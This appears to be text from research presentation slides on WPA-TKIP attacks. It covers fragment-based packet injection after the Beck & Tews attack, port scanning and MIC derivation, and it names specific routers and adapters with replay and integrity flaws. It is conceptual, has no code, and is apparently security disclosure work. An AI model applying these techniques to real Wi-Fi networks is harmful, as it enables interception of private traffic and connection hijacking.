Beck &Tews attack can forge 3 packets.Injecting more requires new keystreams:12Ciphertext PlaintextKeystream All packets start withLLC header We predict these withvery high accuracyCapture packetswith new #ID’s.
LLC Header is only 12 bytes …. Combine them using fragmentation!#ID1 Data1 #ID16 Data16 MICData MICData1 Data16 MICData2 12 bytes/fragment: inject 120 bytes of data
Port Scanner:1. Get MIC key using Beck &Tews attack2. InjectTCP SYN packets3. Detect SYN/ACK based on lengthRemarks: High amount of packet injection proven! Also: DNS poisoning, DHCP spoofing, …14
State1: initial state of every packet State2: state after processing prefix State3: equal to state1 due to magic bytes State4: equal to MIC of sniffed packet!Data MICMagicPrefixSniffed packet18State4State3State2State1
Possible applications? Decrypt web responses: Web mail Bank details … DecryptTCP sequence number, hijackconnection and inject malware?19
Integrity (MIC) not verified when fragmented:AlfaAWUS036h Belkin F5D7053 Ralink U150BB20Attack time reducedfrom >8 min to zero.
No replay protection:AlfaAWUS036h Belkin F5D7053 Tomato 1.28(AP firmware)21No need to generatenew keystreams!
Always accepts unencrypted packets:AlfaAWUS036h Belkin F7D1102 ScarletVDSL(AP of ISP in BE)22Game over, you lose!